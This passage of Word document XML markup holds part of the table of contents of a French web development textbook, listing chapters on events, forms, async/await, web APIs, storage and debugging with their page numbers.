      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>250</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>27.2 Propagation et délégation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>251</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>27.3 Clavier et focus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>252</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>27.4 Événements de formulaire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>252</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>27.5 Événements personnalisés</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>253</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>27.6 Fuites et performance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>253</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>28. Formulaires et validation côté client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>258</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>28.1 L'API de contrainte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>258</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>28.2 Messages personnalisés</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>259</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>28.3 Envoyer sans recharger la page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>259</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>28.4 Erreurs et focus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>261</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>28.5 Cas particuliers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>261</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">29. Asynchrone : promesses et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>266</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>29.1 Pourquoi l'asynchrone existe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>266</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>29.2 Trois états d'une promesse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>267</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">29.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>267</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>29.4 Paralléliser ce qui peut l'être</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>268</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>29.5 Annulation et délais</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>269</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>29.6 Éviter les pièges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>270</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>30. Consommer une API web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>275</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>30.1 Anatomie d'une requête</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>275</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>30.2 Lire et interpréter les codes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>275</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>30.3 Envoyer des données</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>276</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>30.4 Authentification et secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>277</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>30.5 Erreurs réseau et résilience</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>278</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>30.6 Cache et limitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>278</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>31. Stockage, état et persistance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>283</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>31.1 Quatre mécanismes, quatre usages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>283</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>31.2 Sérialiser avec précaution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>284</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>31.3 Un état unique et prévisible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>284</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>31.4 Synchroniser les onglets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>286</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>31.5 IndexedDB en pratique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>286</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>31.6 Vie privée et consentement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>287</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie V — Qualité, performance et mise en production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>32. Déboguer et tester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>292</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>32.1 Une méthode, pas de l'intuition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>293</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>32.2 La console et ses messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>294</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>32.3 Points d'arrêt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>294</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>32.4 Tests unitaires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>295</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
